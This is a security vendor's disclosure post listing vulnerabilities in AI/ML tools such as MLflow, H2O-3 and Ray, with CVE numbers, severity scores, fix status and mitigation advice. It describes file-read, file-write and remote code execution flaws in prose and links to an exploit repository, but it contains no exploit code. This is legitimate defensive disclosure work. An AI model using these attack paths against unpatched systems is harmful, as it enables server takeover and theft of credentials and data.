Protect AI | Threat Research

Protect AI's November 2023 Vulnerability Report

Written by Dan McInerney & Marcello Salvati | Nov 14, 2023 8:00:00 AM

Industry

The AI industry has a security problem, and it’s not in the prompts you type into chatbots. At Protect AI we are taking a proactive approach to identifying and addressing security risks in AI systems, to provide the world with critical intelligence on vulnerabilities and how to fix them. 

Protect AI’s huntr is the world's first AI/ML bug bounty program. Our community of 13,000+ members hunt for impactful vulnerabilities across the entire AI/ML supply chain. Through our research and the huntr community, we’ve found the tools used in the supply chain to build chatbots and other types of AI/ML models suffer from a large range of vulnerabilities. Many of these OSS tools, frameworks, and artifacts, come out of the box with vulnerabilities that can lead directly to complete system takeovers such as unauthenticated remote code execution or local file inclusion vulnerabilities. What does this mean for you? You are likely at risk of theft of models, data, and credentials. Below you will find a list of exploitable vulnerabilities discovered since we launched huntr in August this year. These vulnerabilities are in tools with hundreds of thousands to millions of downloads a month. 

It is important to note that all vulnerabilities were reported to the maintainers a minimum of 45 days prior to this publication, and the fixed status reflects the situation at the time of publication. Our repo of vulnerability scanners and exploits can be found here, and our recommendations for actions to take are listed in the table below. If you need help mitigating these vulnerabilities in the meantime, please reach out, we’re here to help. community@protectai.com.

This Month's Top Vulnerabilities

H2O-3 Local File Inclusion

Impact: Theft of credentials, models, and data

H2O-3 is a low-code service that stands up a web server that allows users to upload data and have a model automatically trained from it. It inadvertently allowed unauthenticated remote users to execute arbitrary JavaScript which can be used to read other user’s data or files on the local system. 

https://github.com/protectai/ai-exploits/tree/main/h2o

H2O-3 Remote Code Execution

Impact: Server takeover leading to foothold in network and theft of sensitive data

H2O-3 allowed users to upload Java models remotely through API calls. Attackers could payload these models with malicious code that was executed by H2O-3 which allowed attackers to gain access to the operating system. Leading to the theft of credentials, models, and data as well as a foothold in the network from which to launch other attacks.

https://github.com/protectai/ai-exploits/tree/main/h2o

MLflow Local File Inclusion

Impact: Theft of credentials, models, and data

MLflow, a tool for storing and tracking models that includes a web server user interface, was vulnerable to local files on the system being read by unauthenticated remote users via the get-artifact API call. Key files such as SSH and cloud credentials were at risk.

https://github.com/protectai/ai-exploits/tree/main/mlflow

MLflow Arbitrary File Write

Impact: Server takeover leading to foothold in network and theft of sensitive data

Due to how MLflow handles protocols associated with their model storage location, an unauthenticated attacker can overwrite arbitrary files on the operating system. There are several paths that can be used to turn this into code execution such as adding one’s own SSH keys to the server allowing for remote login.

https://github.com/protectai/ai-exploits/tree/main/mlflow

Ray Remote Code Execution

Impact: Server takeover leading to foothold in network and theft of sensitive data

Ray is used for the distributed training of machine learning models. In its web interface, unauthenticated attackers could inject commands in a URL parameter which Ray would then execute leading to full system compromise.

https://github.com/protectai/ai-exploits/tree/main/ray

 

CVE

Title

Severity

CVSS

Fixed

Recommendations

CVE-2023-6021

Ray Log File Local File Include

High

7.5

Y

Upgrade to the latest non-vulnerable version

CVE-2023-6020

Ray Static File Local File Include

High

7.5

Y

Upgrade to the latest non-vulnerable version

CVE-2023-6019

Ray Command Injection in cpu_profile parameter 

Critical

9.8

Y

Upgrade to the latest non-vulnerable version

CVE-2023-6023

ModelDB Local File Include

High

8.6

N

Restrict access to the web application

CVE-2023-6018

MLflow Arbitrary File Write

Critical

10

N

Restrict access to the web application

CVE-2023-1177

MLflow Local File Include via Model Versions API

Critical

9.3

Y

Upgrade to the latest non-vulnerable version

CVE-2023-1176

MLflow Arbitrary File Enumeration

Medium

5.9

Y

Restrict access to the web application

CVE-2023-6014

MLflow Authentication Bypass

Critical

9.1

Y

Upgrade to the latest non-vulnerable version

CVE-2023-6015

MLflow Arbitrary File Upload

Critical

10

Y

Upgrade to the latest non-vulnerable version

CVE-2023-6016

H2O Remote Code Execution via POJO Model Import

Critical

10

N

Restrict access to the application

CVE-2023-6038

H2O Local File Include

Critical

9.3

N

Restrict access to the application

CVE-2023-6017

H2O S3 Bucket Takeover

High

8.7

Y

Upgrade to the latest non-vulnerable version

CVE-2023-6013

H2O Stored XSS/LFI

Critical

9.3

N

Restrict access to the application

CVE-2023-43804

Urllib3 Cookie Header Leakage

Medium

5.9

Y

Upgrade to the latest non-vulnerable version

CVE-2023-6022

Prefect Cross Site Request Forgery 

High

8.8

N

Restrict access to the application